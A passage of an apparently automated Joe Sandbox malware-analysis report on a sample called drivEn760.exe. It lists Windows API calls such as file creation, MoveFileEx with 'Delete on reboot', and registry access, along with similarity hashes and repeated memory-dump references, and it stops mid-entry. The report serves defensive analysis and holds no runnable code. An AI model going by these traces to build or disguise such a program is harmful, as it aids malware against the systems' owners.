                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                                                                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                            • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                                                                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000000B,00000001), ref: 00402C14
                                                                                                            • InvalidateRect.USER32(?), ref: 00402C24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 909852535-0
                                                                                                            • Opcode ID: f432a0a30971dc187192fe2491b4b63328d533872b60b8ab23492fb2b34197a6
                                                                                                            • Instruction ID: c061831bd97a7b49b699665abee3b6b910fafb94a2d14f64d6e35fdc86e4b588
                                                                                                            • Opcode Fuzzy Hash: f432a0a30971dc187192fe2491b4b63328d533872b60b8ab23492fb2b34197a6
                                                                                                            • Instruction Fuzzy Hash: 36E08C72700408FFEB11CBA4EE84DAEB7B9FB40315F00007AF502A00A0D7300D51CA28
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,75923420,00000000,75922EE0,00403C59,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C9C
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403CA3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 1100898210-0
                                                                                                            • Opcode ID: e868f33ba05eeb96666b2da3448a48ed76ae7177416a2bb01e196352cb617163
                                                                                                            • Instruction ID: 1b4b668df254a36c82b8f96f79c5ae0e05fb6c29bd97d86a5de4613e9375b038
                                                                                                            • Opcode Fuzzy Hash: e868f33ba05eeb96666b2da3448a48ed76ae7177416a2bb01e196352cb617163
                                                                                                            • Instruction Fuzzy Hash: 0AE08C335052205BD6211F55EA0875A7768AF94B26F06006AE980BB26087781C424BC8
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 0040615C
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390214022-0
                                                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F0DD,0040CEF0,00403579,0040CEF0,0040F0DD,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                            APIs
                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1096422788-0
                                                                                                            • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                                            • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                                                                                                            • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                                            • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Delete on reboot: ,?), ref: 004064F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                            • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                            • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                                            APIs
                                                                                                            • MoveFileExW.KERNELBASE(?,?,00000005,00405F26,?,00000000,000000F1,?,?,?,?,?), ref: 00406432
                                                                                                              • Part of subcall function 004062AE: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                              • Part of subcall function 004062AE: GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                                              • Part of subcall function 004062AE: GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                                              • Part of subcall function 004062AE: wsprintfA.USER32 ref: 0040632D
                                                                                                              • Part of subcall function 004062AE: GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                              • Part of subcall function 004062AE: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                              • Part of subcall function 004062AE: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                              • Part of subcall function 004062AE: SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1930046112-0
                                                                                                            • Opcode ID: bdc11d80229984bc477bed0571759e654de673e128be4c1f7cb28a7cce0576a7
                                                                                                            • Instruction ID: d3b9bfb9c0db6fc8db9074ee2ed4882d570213e71fb706cb6d50b5bff1c4181d
